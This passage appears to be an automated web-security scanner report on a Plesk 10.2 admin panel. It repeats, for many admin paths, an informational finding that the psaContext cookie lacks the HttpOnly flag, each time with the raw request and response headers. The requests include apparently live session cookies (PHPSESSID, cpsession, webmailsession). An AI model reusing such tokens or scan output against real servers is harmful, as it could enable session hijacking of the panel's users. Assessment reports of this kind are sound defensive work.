Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 10515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list/reset-search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 10515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/create

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:57:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:57:58 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 18:57:58 GMT
Server: sw-cp-server
Content-Length: 46021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list?context=customers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:57:50 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:57:52 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 18:57:52 GMT
Server: sw-cp-server
Content-Length: 17559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 16547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 16316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:16:54 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:54 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:54 GMT
Server: sw-cp-server
Content-Length: 16316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/login-info/id/4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/login-info/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:03:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:03:01 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 16:03:01 GMT
Server: sw-cp-server
Content-Length: 10366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/overview/id/4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:02:47 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:02:47 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server
Content-Length: 21835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/personal-info/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/personal-info/id/4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/personal-info/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:02:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:02:52 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 16:02:52 GMT
Server: sw-cp-server
Content-Length: 28591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/domain/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/domain/list?context=domains HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:07 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=domains; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:07 GMT
Server: sw-cp-server
Content-Length: 10295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/?group=Services HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:02 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=health; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:02 GMT
Server: sw-cp-server
Content-Length: 7263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller-self/subscription-overview/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller-self/subscription-overview/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:38 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=deleted; expires=Fri, 24-Sep-2010 14:13:37 GMT; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:38 GMT
Server: sw-cp-server
Content-Length: 22558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list?context=resellers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
